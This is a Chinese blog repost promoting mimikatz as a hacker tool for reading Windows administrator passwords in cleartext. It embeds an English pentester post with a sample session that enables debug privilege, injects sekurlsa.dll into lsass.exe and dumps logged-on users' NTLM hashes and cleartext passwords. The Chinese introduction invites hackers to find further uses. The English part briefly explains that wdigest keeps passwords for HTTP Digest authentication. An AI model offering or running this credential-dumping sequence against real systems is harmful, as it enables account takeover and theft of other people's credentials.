trunk版本的神器mimikatz

32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog